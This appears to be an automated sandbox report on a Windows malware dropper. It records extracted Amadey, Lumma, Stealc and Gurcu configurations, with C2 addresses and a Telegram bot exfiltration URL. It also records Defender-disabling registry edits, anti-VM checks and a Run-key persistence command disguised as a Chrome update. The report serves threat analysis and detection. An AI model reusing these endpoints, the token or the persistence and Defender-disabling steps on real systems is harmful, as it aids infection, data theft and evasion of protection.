Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe
Resource
win7-20240903-en
General
-
Target
16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe
-
Size
1.8MB
-
MD5
7b92d16653d665a34de4c92d58e583df
-
SHA1
3023e4305423e69cabf82b2e0ba20d87cf67cd85
-
SHA256
16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12
-
SHA512
6efb2fa816fe7bb92e91233756781ffed7d72594d4ae927e0ea3fcb61744e9bd7dfe626c6e64445d0797815748765032b44d9ab1a3c6f22e46dd86cda5098a03
-
SSDEEP
24576:GiZI3q/ZYhTUvu4XYCK7mqtpvp8GPlAdD/9zmt26WeQcEcPH8GLMOMGEP0dH:G0IqwUVXN+8GPap9iOrGLJM/Pm
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://ratiomun.cyou
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://ratiomun.cyou/api
Extracted
gurcu
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendMessage?chat_id=7538374929
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/getUpdates?offset=-
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Amadey family
-
Gurcu family
-
Lumma family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 0fba2c100f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 0fba2c100f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 0fba2c100f.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 0fba2c100f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 0fba2c100f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 0fba2c100f.exe -
Stealc family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 40673ab59a.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GI59vO6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 40673ab59a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rhnew.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BhD8htX.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6284ef5aab.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d235088e23.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 30e19168b2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0fba2c100f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BhD8htX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d235088e23.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0fba2c100f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 40673ab59a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 30e19168b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 30e19168b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GI59vO6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BhD8htX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d235088e23.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GI59vO6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6284ef5aab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6284ef5aab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0fba2c100f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 40673ab59a.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 4XYFk9r.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 14 IoCs
pid Process 4012 skotes.exe 1596 GI59vO6.exe 400 4XYFk9r.exe 2332 Update.exe 1288 BhD8htX.exe 3852 skotes.exe 1584 6284ef5aab.exe 1920 d235088e23.exe 1540 30e19168b2.exe 3180 9e7a56c139.exe 1000 0fba2c100f.exe 5936 40673ab59a.exe 5920 rhnew.exe 6112 skotes.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine GI59vO6.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 6284ef5aab.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 30e19168b2.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine rhnew.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine BhD8htX.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine d235088e23.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 0fba2c100f.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 40673ab59a.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe -
Loads dropped DLL 2 IoCs
pid Process 400 4XYFk9r.exe 2332 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 0fba2c100f.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 0fba2c100f.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d235088e23.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012209001\\d235088e23.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\30e19168b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012210001\\30e19168b2.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9e7a56c139.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012211001\\9e7a56c139.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0fba2c100f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012212001\\0fba2c100f.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 54 raw.githubusercontent.com 60 raw.githubusercontent.com 53 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0009000000023c05-214.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3048 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 4532 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe 4012 skotes.exe 1596 GI59vO6.exe 1288 BhD8htX.exe 3852 skotes.exe 1584 6284ef5aab.exe 1920 d235088e23.exe 1540 30e19168b2.exe 1000 0fba2c100f.exe 5936 40673ab59a.exe 5920 rhnew.exe 6112 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 1988 1596 WerFault.exe 83 4932 1596 WerFault.exe 83 1040 1596 WerFault.exe 83 5632 5920 WerFault.exe 139 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9e7a56c139.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 9e7a56c139.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GI59vO6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6284ef5aab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0fba2c100f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BhD8htX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d235088e23.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 30e19168b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 40673ab59a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 9e7a56c139.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rhnew.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1512 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3148 taskkill.exe 2216 taskkill.exe 1064 taskkill.exe 1832 taskkill.exe 1828 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4712 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4532 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe 4532 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe 4012 skotes.exe 4012 skotes.exe 1596 GI59vO6.exe 1596 GI59vO6.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 400 4XYFk9r.exe 1288 BhD8htX.exe 1288 BhD8htX.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 3852 skotes.exe 3852 skotes.exe 1584 6284ef5aab.exe 1584 6284ef5aab.exe 2332 Update.exe 2332 Update.exe 2332 Update.exe 1920 d235088e23.exe 1920 d235088e23.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 400 4XYFk9r.exe Token: SeDebugPrivilege 3048 tasklist.exe Token: SeDebugPrivilege 2332 Update.exe Token: SeDebugPrivilege 3148 taskkill.exe Token: SeDebugPrivilege 2216 taskkill.exe Token: SeDebugPrivilege 1064 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 3736 firefox.exe Token: SeDebugPrivilege 3736 firefox.exe Token: SeDebugPrivilege 1000 0fba2c100f.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 4532 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3736 firefox.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe 3180 9e7a56c139.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2332 Update.exe 3736 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4532 wrote to memory of 4012 4532 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe 82 PID 4532 wrote to memory of 4012 4532 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe 82 PID 4532 wrote to memory of 4012 4532 16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe 82 PID 4012 wrote to memory of 1596 4012 skotes.exe 83 PID 4012 wrote to memory of 1596 4012 skotes.exe 83 PID 4012 wrote to memory of 1596 4012 skotes.exe 83 PID 4012 wrote to memory of 400 4012 skotes.exe 94 PID 4012 wrote to memory of 400 4012 skotes.exe 94 PID 400 wrote to memory of 816 400 4XYFk9r.exe 99 PID 400 wrote to memory of 816 400 4XYFk9r.exe 99 PID 816 wrote to memory of 1132 816 cmd.exe 101 PID 816 wrote to memory of 1132 816 cmd.exe 101 PID 816 wrote to memory of 3048 816 cmd.exe 102 PID 816 wrote to memory of 3048 816 cmd.exe 102 PID 816 wrote to memory of 3160 816 cmd.exe 103 PID 816 wrote to memory of 3160 816 cmd.exe 103 PID 816 wrote to memory of 1512 816 cmd.exe 104 PID 816 wrote to memory of 1512 816 cmd.exe 104 PID 816 wrote to memory of 2332 816 cmd.exe 105 PID 816 wrote to memory of 2332 816 cmd.exe 105 PID 4012 wrote to memory of 1288 4012 skotes.exe 106 PID 4012 wrote to memory of 1288 4012 skotes.exe 106 PID 4012 wrote to memory of 1288 4012 skotes.exe 106 PID 4012 wrote to memory of 1584 4012 skotes.exe 108 PID 4012 wrote to memory of 1584 4012 skotes.exe 108 PID 4012 wrote to memory of 1584 4012 skotes.exe 108 PID 2332 wrote to memory of 3096 2332 Update.exe 109 PID 2332 wrote to memory of 3096 2332 Update.exe 109 PID 3096 wrote to memory of 4712 3096 cmd.exe 111 PID 3096 wrote to memory of 4712 3096 cmd.exe 111 PID 4012 wrote to memory of 1920 4012 skotes.exe 112 PID 4012 wrote to memory of 1920 4012 skotes.exe 112 PID 4012 wrote to memory of 1920 4012 skotes.exe 112 PID 4012 wrote to memory of 1540 4012 skotes.exe 114 PID 4012 wrote to memory of 1540 4012 skotes.exe 114 PID 4012 wrote to memory of 1540 4012 skotes.exe 114 PID 4012 wrote to memory of 3180 4012 skotes.exe 116 PID 4012 wrote to memory of 3180 4012 skotes.exe 116 PID 4012 wrote to memory of 3180 4012 skotes.exe 116 PID 3180 wrote to memory of 3148 3180 9e7a56c139.exe 117 PID 3180 wrote to memory of 3148 3180 9e7a56c139.exe 117 PID 3180 wrote to memory of 3148 3180 9e7a56c139.exe 117 PID 3180 wrote to memory of 2216 3180 9e7a56c139.exe 119 PID 3180 wrote to memory of 2216 3180 9e7a56c139.exe 119 PID 3180 wrote to memory of 2216 3180 9e7a56c139.exe 119 PID 3180 wrote to memory of 1064 3180 9e7a56c139.exe 121 PID 3180 wrote to memory of 1064 3180 9e7a56c139.exe 121 PID 3180 wrote to memory of 1064 3180 9e7a56c139.exe 121 PID 3180 wrote to memory of 1832 3180 9e7a56c139.exe 123 PID 3180 wrote to memory of 1832 3180 9e7a56c139.exe 123 PID 3180 wrote to memory of 1832 3180 9e7a56c139.exe 123 PID 3180 wrote to memory of 1828 3180 9e7a56c139.exe 125 PID 3180 wrote to memory of 1828 3180 9e7a56c139.exe 125 PID 3180 wrote to memory of 1828 3180 9e7a56c139.exe 125 PID 3180 wrote to memory of 3172 3180 9e7a56c139.exe 127 PID 3180 wrote to memory of 3172 3180 9e7a56c139.exe 127 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 PID 3172 wrote to memory of 3736 3172 firefox.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe"C:\Users\Admin\AppData\Local\Temp\16ecebf3a511ecf41aedcb046c749990fd7d25581a3387bb6204989b78928d12.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1596 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 15844⤵
- Program crash
PID:1988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 15604⤵
- Program crash
PID:4932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 15244⤵
- Program crash
PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFFFB.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpFFFB.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:1132
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 400"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\find.exefind ":"5⤵PID:3160
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak5⤵
- Delays execution with timeout.exe
PID:1512
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f6⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:4712
-
-
-
-
-
-
